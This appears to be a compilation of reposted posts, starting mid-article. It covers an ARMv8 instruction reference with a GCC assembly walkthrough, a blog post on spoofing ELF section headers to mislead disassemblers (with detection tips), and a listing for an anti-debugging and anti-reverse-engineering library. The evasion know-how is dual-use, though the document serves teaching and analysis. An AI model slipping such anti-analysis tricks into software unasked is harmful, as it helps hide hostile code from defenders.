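To make the role of <shift> in the immediate forms concrete, the following C sketch checks whether a constant can be used directly as the #<imm> of an ADD or SUB (immediate). It assumes the A64 encoding as I understand it: a 12-bit unsigned immediate, optionally shifted left by 12. The helper name fits_add_imm is hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical helper: returns true if `value` is encodable as an
   ADD/SUB (immediate) operand and stores the required LSL amount
   (0 or 12) in *lsl_out. *lsl_out is not written on failure. */
bool fits_add_imm(uint64_t value, unsigned *lsl_out)
{
    if (value <= 0xFFF) {                 /* plain 12-bit immediate */
        *lsl_out = 0;
        return true;
    }
    if ((value & 0xFFF) == 0 && value <= 0xFFF000) {
        *lsl_out = 12;                    /* 12-bit immediate, LSL #12 */
        return true;
    }
    return false;                         /* needs a register operand instead */
}
```

Under these assumptions 80 is encodable as-is, 0x1000 is encodable as #1, LSL #12, and 0x1001 is not encodable in a single ADD (immediate).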
Logical
[TABLE]
[TR] [TD]AND[/TD] [TD]Bitwise AND[/TD] [TD]AND <Xd|SP>, <Xn>, #<imm> ;Rd = Rn AND imm[/TD] [/TR]
[TR] [TD]ANDS[/TD] [TD]Bitwise AND and set flags[/TD] [TD]ANDS <Xd>, <Xn>, #<imm> ;Rd = Rn AND imm[/TD] [/TR]
[TR] [TD]EOR[/TD] [TD]Bitwise exclusive OR[/TD] [TD]EOR <Xd|SP>, <Xn>, #<imm> ;Rd = Rn EOR imm[/TD] [/TR]
[TR] [TD]ORR[/TD] [TD]Bitwise inclusive OR[/TD] [TD]ORR <Xd|SP>, <Xn>, #<imm> ;Rd = Rn OR imm[/TD] [/TR]
[TR] [TD]TST[/TD] [TD]Test bits[/TD] [TD]TST <Xn>, #<imm> ;Rn AND imm[/TD] [/TR]
[/TABLE]
Move
Instructions to move a wide immediate (16 bits):
[TABLE]
[TR] [TD]MOVZ[/TD] [TD]Move wide with zero[/TD] [TD]MOVZ <Xd>, #<imm>{, LSL #<shift>} ;Rd = LSL (imm16, shift)[/TD] [/TR]
[TR] [TD]MOVN[/TD] [TD]Move wide with NOT[/TD] [TD]MOVN <Xd>, #<imm>{, LSL #<shift>} ;Rd = NOT (LSL (imm16, shift))[/TD] [/TR]
[TR] [TD]MOVK[/TD] [TD]Move 16-bit immediate into register, keeping other bits unchanged[/TD] [TD]MOVK <Xd>, #<imm>{, LSL #<shift>} ;Rd<shift+15:shift> = imm16[/TD] [/TR]
[/TABLE]
There is also an instruction to move an immediate: MOV <Xd>, #<imm> ;Rd = imm. It is only an alias, however: depending on the value, the assembler encodes it as MOVZ, MOVN or ORR (bitmask immediate).
PC-relative address calculation
The ADR instruction adds a signed, 21-bit immediate to the value of the program counter that fetched this instruction, and then writes the result to a general-purpose register: ADR <Xd>, <label>
The ADRP instruction permits the calculation of the address at a 4KB aligned memory region.
In conjunction with an ADD (immediate) instruction, or a load/store instruction with a 12-bit immediate offset, this allows for the calculation of, or access to, any address within ±4GB of the current PC: ADRP <Xd>, <label>
Shift
[TABLE]
[TR] [TD]ASR[/TD] [TD]Arithmetic shift right[/TD] [TD]ASR <Xd>, <Xn>, #<shift>[/TD] [/TR]
[TR] [TD]LSL[/TD] [TD]Logical shift left[/TD] [TD]LSL <Xd>, <Xn>, #<shift>[/TD] [/TR]
[TR] [TD]LSR[/TD] [TD]Logical shift right[/TD] [TD]LSR <Xd>, <Xn>, #<shift>[/TD] [/TR]
[TR] [TD]ROR[/TD] [TD]Rotate right[/TD] [TD]ROR <Xd>, <Xn>, #<shift>[/TD] [/TR]
[/TABLE]
[h=3]Data processing – register[/h]
Arithmetic (shifted register)
[*]ADD: Add
[*]ADDS: Add and set flags
[*]SUB: Subtract
[*]SUBS: Subtract and set flags
[*]CMN: Compare negative
[*]CMP: Compare
[*]NEG: Negate ;Rd = 0 - shift(Rm, amount)
[*]NEGS: Negate and set flags
This is how ADD works; the others are similar:
ADD <Xd>, <Xn>, <Xm>{, <shift> #<amount>} ;Rd = Rn + shift(Rm, amount)
There are also the arithmetic with carry instructions, which accept two source registers with the carry flag as an additional input to the calculation, and do not support shifts:
[*]ADC: Add with carry. ADC <Xd>, <Xn>, <Xm>
[*]ADCS: Add with carry and set flags. ADCS <Xd>, <Xn>, <Xm> ;Rd = Rn + Rm + C
[*]SBC: Subtract with carry. SBC <Xd>, <Xn>, <Xm> ;Rd = Rn - Rm - 1 + C
[*]SBCS: Subtract with carry and set flags
[*]NGC: Negate with carry. NGC <Xd>, <Xm> ;Rd = 0 - Rm - 1 + C
[*]NGCS: Negate with carry and set flags
Logical (shifted register)
[*]AND: Bitwise AND
[*]ANDS: Bitwise AND and set flags
[*]BIC: Bitwise bit clear ;Rd = Rn AND NOT shift(Rm, amount)
[*]BICS: Bitwise bit clear and set flags
[*]EON: Bitwise exclusive OR NOT ;Rd = Rn EOR NOT shift(Rm, amount)
[*]EOR: Bitwise exclusive OR ;Rd = Rn EOR shift(Rm, amount)
[*]ORR: Bitwise inclusive OR
[*]MVN: Bitwise NOT ;Rd = NOT shift(Rm, amount)
[*]ORN: Bitwise inclusive OR NOT ;Rd = Rn OR NOT shift(Rm, amount)
[*]TST: Test bits ;Rn AND shift(Rm, amount)
How they work:
AND <Xd>, <Xn>, <Xm>{, <shift> #<amount>} ;Rd = Rn AND shift(Rm, amount)
Here <shift> accepts the usual shift operators plus ROR (rotate right).
Multiply and divide
[*]MADD: Multiply-add. MADD <Xd>, <Xn>, <Xm>, <Xa> ;Rd = Ra + Rn * Rm
[*]MSUB: Multiply-subtract
[*]MNEG: Multiply-negate
[*]MUL: Multiply. MUL <Xd>, <Xn>, <Xm> ;Rd = Rn * Rm
[*]SMADDL: Signed multiply-add long
[*]SMSUBL: Signed multiply-subtract long
[*]SMNEGL: Signed multiply-negate long
[*]SMULL: Signed multiply long
[*]SMULH: Signed multiply high
[*]UMADDL: Unsigned multiply-add long
[*]UMSUBL: Unsigned multiply-subtract long
[*]UMNEGL: Unsigned multiply-negate long
[*]UMULL: Unsigned multiply long
[*]UMULH: Unsigned multiply high
[*]SDIV: Signed divide. SDIV <Xd>, <Xn>, <Xm> ;Rd = Rn / Rm
[*]UDIV: Unsigned divide
Move
The Move (register) instructions are aliases for other data processing instructions. They copy a value from a general-purpose register to another general-purpose register or the current stack pointer, or from the current stack pointer to a general-purpose register.
MOV <Xd>, <Xm> ;Xd = Xm
Shift (register)
[*]ASRV: Arithmetic shift right variable
[*]LSLV: Logical shift left variable
[*]LSRV: Logical shift right variable
[*]RORV: Rotate right variable
An example: ASRV <Xd>, <Xn>, <Xm> ;Rd = ASR(Rn, Rm)
The register forms of ASR, LSL, LSR and ROR are aliases of these instructions, written without the trailing V.
CRC32
The optional CRC32 instructions operate on the general-purpose register file to update a 32-bit CRC value from an input value comprising 1, 2, 4, or 8 bytes. There are two different classes of CRC instructions, CRC32 and CRC32C, that support two commonly used 32-bit polynomials, known as CRC-32 and CRC-32C.
Conditional select
The Conditional select instructions select between the first or second source register, depending on the current state of the condition flags.
[TABLE]
[TR] [TD]CSEL[/TD] [TD]Conditional select[/TD] [TD]CSEL <Xd>, <Xn>, <Xm>, <cond> ;Rd = if cond then Rn else Rm[/TD] [/TR]
[TR] [TD]CSINC[/TD] [TD]Conditional select increment[/TD] [TD]CSINC <Xd>, <Xn>, <Xm>, <cond> ;Rd = if cond then Rn else (Rm + 1)[/TD] [/TR]
[TR] [TD]CSINV[/TD] [TD]Conditional select inversion[/TD] [TD]CSINV <Xd>, <Xn>, <Xm>, <cond> ;Rd = if cond then Rn else NOT (Rm)[/TD] [/TR]
[TR] [TD]CSNEG[/TD] [TD]Conditional select negation[/TD] [TD]CSNEG <Xd>, <Xn>, <Xm>, <cond> ;Rd = if cond then Rn else -Rm[/TD] [/TR]
[TR] [TD]CSET[/TD] [TD]Conditional set[/TD] [TD]CSET <Xd>, <cond> ;Rd = if cond then 1 else 0[/TD] [/TR]
[TR] [TD]CSETM[/TD] [TD]Conditional set mask[/TD] [TD]CSETM <Xd>, <cond> ;Rd = if cond then -1 else 0[/TD] [/TR]
[TR] [TD]CINC[/TD] [TD]Conditional increment[/TD] [TD]CINC <Xd>, <Xn>, <cond> ;Rd = if cond then Rn+1 else Rn[/TD] [/TR]
[TR] [TD]CINV[/TD] [TD]Conditional invert[/TD] [TD]CINV <Xd>, <Xn>, <cond> ;Rd = if cond then NOT(Rn) else Rn[/TD] [/TR]
[TR] [TD]CNEG[/TD] [TD]Conditional negate[/TD] [TD]CNEG <Xd>, <Xn>, <cond> ;Rd = if cond then -Rn else Rn[/TD] [/TR]
[/TABLE]
Conditional comparison
The Conditional comparison instructions provide a conditional select for the NZCV
condition flags, setting the flags to the result of an arithmetic comparison of its two source register values if the named input condition is true, or to an immediate value if the input condition is false. There are register and immediate forms. The immediate form compares the source register to a small 5-bit unsigned value.
[TABLE]
[TR] [TD]CCMN[/TD] [TD]Conditional compare negative (register)[/TD] [TD]CCMN <Xn>, <Xm>, #<nzcv>, <cond> ;flags = if cond then compare(Rn, -Rm) else #nzcv[/TD] [/TR]
[TR] [TD]CCMN[/TD] [TD]Conditional compare negative (immediate)[/TD] [TD]CCMN <Xn>, #<imm>, #<nzcv>, <cond> ;flags = if cond then compare(Rn, #-imm) else #nzcv[/TD] [/TR]
[TR] [TD]CCMP[/TD] [TD]Conditional compare (register)[/TD] [TD]CCMP <Xn>, <Xm>, #<nzcv>, <cond> ;flags = if cond then compare(Rn, Rm) else #nzcv[/TD] [/TR]
[TR] [TD]CCMP[/TD] [TD]Conditional compare (immediate)[/TD] [TD]CCMP <Xn>, #<imm>, #<nzcv>, <cond> ;flags = if cond then compare(Rn, #imm) else #nzcv[/TD] [/TR]
[/TABLE]
Where:
<nzcv> is the flag bit specifier, an immediate in the range 0 to 15, giving the alternative state for the 4-bit NZCV condition flags, encoded in the nzcv field.
<imm> is a five-bit unsigned (positive) immediate encoded in the imm5 field.
How CCMP works: it tests the NZCV flags against <cond>. If the condition holds (that is, the previous comparison passed), it performs this comparison and sets NZCV from its result; otherwise it sets NZCV to <nzcv>.
If we have to write the test x0 >= x1 && x2 == x3 in ARM assembly, with ccmp we can do this:
cmp x0, x1
ccmp x2, x3, #0, ge
beq good
[h=2]Assembly Example:[/h]
It's time to code! Like other assembly tutorials, I show the C code first and then the ARM asm.
    #include <stdio.h>

    static int v[] = {1,2,3,4,5,6,7,8,9,10};

    void print(int i);
    int add(int v, int t);

    int main()
    {
        int i;
        int array[10];
        for(i=0; i < 10; i++)
            array[i] = v[i] * (add(i,5));
        return 0;
    }

    int add(int v, int t)
    {
        return v + t;
    }

Now this is the asm code generated by GCC (you need to download Linaro GCC to build code for ARMv8):

        .cpu generic+fp+simd
        .data
        .align 3
        .type v, %object
        .size v, 40
    // v array
    v:
        .word 1
        .word 2
        .word 3
        .word 4
        .word 5
        .word 6
        .word 7
        .word 8
        .word 9
        .word 10
    // dump:
    // 0000000000410918 :
    //   410918: 00000001 .word 0x00000001
    //   41091c: 00000002 .word 0x00000002
    //   410920: 00000003 .word 0x00000003
    //   410924: 00000004 .word 0x00000004
    //   410928: 00000005 .word 0x00000005
    //   41092c: 00000006 .word 0x00000006
    //   410930: 00000007 .word 0x00000007
    //   410934: 00000008 .word 0x00000008
    //   410938: 00000009 .word 0x00000009
    //   41093c: 0000000a .word 0x0000000a
    // end dump
        .text
        .align 2
        .global main
        .type main, %function
    main:
        stp x29, x30, [sp, -80]!   // pre-indexed: sp = sp-80, then store x29 at [sp] and x30 at [sp+8];
                                   // the 80 bytes also make room for i and array
        add x29, sp, 0             // frame pointer = stack pointer
        str x19, [sp,16]           // save x19 (base plus offset addressing)
        // start of the loop
        str wzr, [x29,76]          // i = 0 (wzr is the zero register)
        b .L2                      // branch to label
    .L3:
        adrp x0, v                 // page address of v --> dump: adrp x0, 410000
        add x1, x0, :lo12:v        // --> dump: add x1, x0, #0x918 (see 0x410918 in the dump above)
        ldrsw x0, [x29,76]         // load signed word (variable i)
        lsl x0, x0, 2              // logical shift left (multiply by 2^2) to get the byte offset of element i
        add x0, x1, x0
        ldr w19, [x0]              // w19 = v[i]
        ldr w0, [x29,76]           // [x29,76] is i; w0 is the first parameter register
        mov w1, 5                  // w1 is the second parameter register
        bl add                     // call add(w0, w1)
        mul w1, w19, w0            // after the bl, w0 holds the return value: w1 = v[i] * add(i, 5)
        add x2, x29, 32            // array base address: FP+32
        ldrsw x0, [x29,76]         // load variable i
        lsl x0, x0, 2              // compute the byte offset
        add x0, x2, x0             // of array[i], as for v[i]
        str w1, [x0]               // store w1 at the address in x0
        ldr w0, [x29,76]
        add w0, w0, 1              // i += 1
        str w0, [x29,76]
    .L2:
        ldr w0, [x29,76]
        cmp w0, 9
        ble .L3                    // if i <= 9, run the loop body again
        // end of the for loop
        mov w0, 0                  // w0 is the return value register
        ldr x19, [sp,16]           // restore the old x19 value
        ldp x29, x30, [sp], 80     // post-indexed: restore frame pointer and return address, then sp = sp+80
        ret                        // return to the address in x30
        .size main, .-main
        .text
        .align 2
        .global add
        .type add, %function
    add:
        // prologue
        sub sp, sp, #16            // reserve 16 bytes of stack
        str w0, [sp,12]            // save the first parameter
        str w1, [sp,8]             // save the second parameter
        // body
        ldr w1, [sp,12]            // load the first parameter
        ldr w0, [sp,8]             // load the second parameter
        add w0, w1, w0             // w0 holds the result
        // epilogue
        add sp, sp, 16             // release the stack
        ret                        // return to the address in x30
        .size add, .-add

To run this code, you can use the ARM Foundation Model (it's free), as shown here: the Hello World in ARMv8
Source: Introduction to ARMv8 64-bit Architecture
  24. [h=1]Hiding code in ELF binary[/h]
Written by aaSSfxxx - 11 December 2013
Since I started contributing to radare2, I have been learning how a disassembler works, and especially how disassemblers handle ELF files. I noticed that almost all (maybe even all?) disassemblers rely on the ELF section headers (generally located at the end of the file), which are never actually used at run time (by the Linux kernel or glibc), because the mapping of an ELF file into memory is given by the program headers (another ELF structure, which I described in my article about an ELF packer). So we can easily hide code from disassemblers by manipulating the virtual address fields of the ".text" section structure. I'll use a hexadecimal editor and the latest git revision of radare2 (which fixes a bug related to virtual address calculation in ELF binaries), so I recommend having those tools installed on your computer before reading on.
[h=2]The trick[/h]
First, let's start with the following code:

    #include <stdio.h>

    int main()
    {
        printf("You will never see me !\n");
        return 0;
    }

    int foo()
    {
        return 1;
    }

The goal of this article is to make disassemblers believe that the entry point of the binary is the "foo" function (and not the _start function added by gcc). First, let's compile the source code so that we can work on the generated executable. Then we need to grab the offset of the "foo" symbol, by running
Code BASH : rabin2 -s a.out | grep foo
and noting the offset of the symbol somewhere. Then we strip all symbols from the binary (to avoid corrupted disassembly in IDA) using the "strip" command. Next we need to retrieve the offset of the section header table, which is stored at offset 0x20 of the file (for 32-bit executables; I don't have a 64-bit system yet, so please tell me if it still works). Then we use radare2 (and its tool rabin2) to get the index, in the array of sections, of the .text section we are going to spoof. So we execute
Code BASH : rabin2 -S a.out | grep .text
and note the "idx" field somewhere.
To find the section header we just need to calculate
Code PSEUDO : section_offset + (idx+1)*0x28
0x28 is the size of a section header entry, and we need to add 1 to the idx we got from radare2 because it seems to ignore the null section at the beginning. Then go to the offset calculated above and modify the "sh_offset" field of the Elf_Shdr structure (at offset 0x10 relative to the beginning of the structure). Don't forget that we work in little endian (x86) when you edit the binary in your hex editor! Then save the program and execute it (it should show "You will never see me !"). When you try to disassemble it, you will see the disassembly of the foo function as the entry point!
[h=2]What happened and how to detect it ?[/h]
As I said in the introduction, the kernel relies on the program header table (which generally follows the ELF header) and maps the PT_LOAD program headers into memory (see the articles on the ELF packer I wrote). Section headers are therefore totally optional in ELF binaries and are just metadata, since everything the dynamic linker needs to know is stored in the program header of type PT_DYNAMIC. So we can easily spoof almost any section header without any impact on the program's execution, but disassemblers (even IDA) will be fooled and will produce incoherent disassembly, because they rely on section headers, which are not reliable.
Still, there are some ways to detect it. In almost all binaries generated by compilers, the virtual address usually ends with the same digits as the file offset. For example, 0x08048130 will match offset 0x130 in the file, or 0x08049156 can match offset 0x156. After this manipulation, the offsets no longer match the virtual addresses at all, which can indicate that the binary was modified. Another approach is to erase the section header offset and count in the ELF header, which forces disassemblers (IDA and radare2 for instance) to rely on the program headers for disassembly, or to try to fix the section header manually.
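The offset arithmetic and the detection heuristic above can be sketched in C for the 32-bit case. The function names are made up for this illustration, and comparing the low 12 bits (one 4 KiB page) is my assumption about what "same last digits" means in practice; the article itself only gives the two examples.

```c
#include <stdbool.h>
#include <stdint.h>

#define ELF32_SHDR_SIZE 0x28u  /* size of one 32-bit section header entry */
#define SH_OFFSET_FIELD 0x10u  /* position of sh_offset inside the entry  */

/* File offset of the sh_offset field to patch. e_shoff is the value read
   at file offset 0x20; rabin2_idx is the idx printed by rabin2 -S, which
   (per the article) does not count the leading null section. */
uint32_t sh_offset_field_pos(uint32_t e_shoff, uint32_t rabin2_idx)
{
    return e_shoff + (rabin2_idx + 1u) * ELF32_SHDR_SIZE + SH_OFFSET_FIELD;
}

/* Heuristic: flag a section whose virtual address and file offset
   disagree in their low 12 bits (assumed 4 KiB page granularity). */
bool looks_spoofed(uint32_t sh_addr, uint32_t sh_offset)
{
    return (sh_addr & 0xFFFu) != (sh_offset & 0xFFFu);
}
```

With the article's example, looks_spoofed(0x08048130, 0x130) is false, while a patched entry such as looks_spoofed(0x08048130, 0x456) is true. A mismatch is only a hint that the header was edited, not proof.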
Source: Hiding code in ELF binary - aaSSfxxx's blog
  25. Update (03-12-2014): This tool is no longer endorsed by MorXploit as the author is no longer part of the team.
Description: MorXAntiRE is a library that collects anti (debugger/disassembly/dump/VM/sandbox) tricks. MorXAntiRE is licensed under GNU/GPL version 3 and developed in C using Visual Studio 2012 and inline assembly.
Anti-Debugging: IsDebuggerPresentAPI, IsDebuggerPresentPEB, CheckRemoteDebuggerPresentAPI, NtQueryInformationProcess (ProcessDbgPort), NtQueryInformationProcess (ProcessDebugFlags), NtQueryInformationProcess (ProcessDebugObject), NtGlobalFlag, NtSetInformationThread (HideThreadFromDebugger), Open Process, Parent Process, Self-Debug (CreateProcess), UnhandledExceptionFilter, NtQueryObject
Debugger-Attacks: BlockInputAPI, OutputDebugString
Timing Attacks: RDTSC, Win32Timing (GetTickCount)
Anti-Breakpoint: 0xCC BP detection, Memory Breakpoint Debugger Check (Guard Pages), Hardware Breakpoint Check (Debug registers with Get/SetThreadContext), Hardware Breakpoint Check (Debug registers with Structured Exception Handling)
Author: Ayoub Faouzi <noteworthy_at_morxploit_dot_com>
Version: MorXAntiRE v1.5
MD5: 372271696bf4a5aab6b5a4a3cf7ae794
Requirements: Windows 32 bits
Download: Link 1
Source: MorXAntiRE Anti reverse code engineering and dynamic analysis tool | MorXploit Research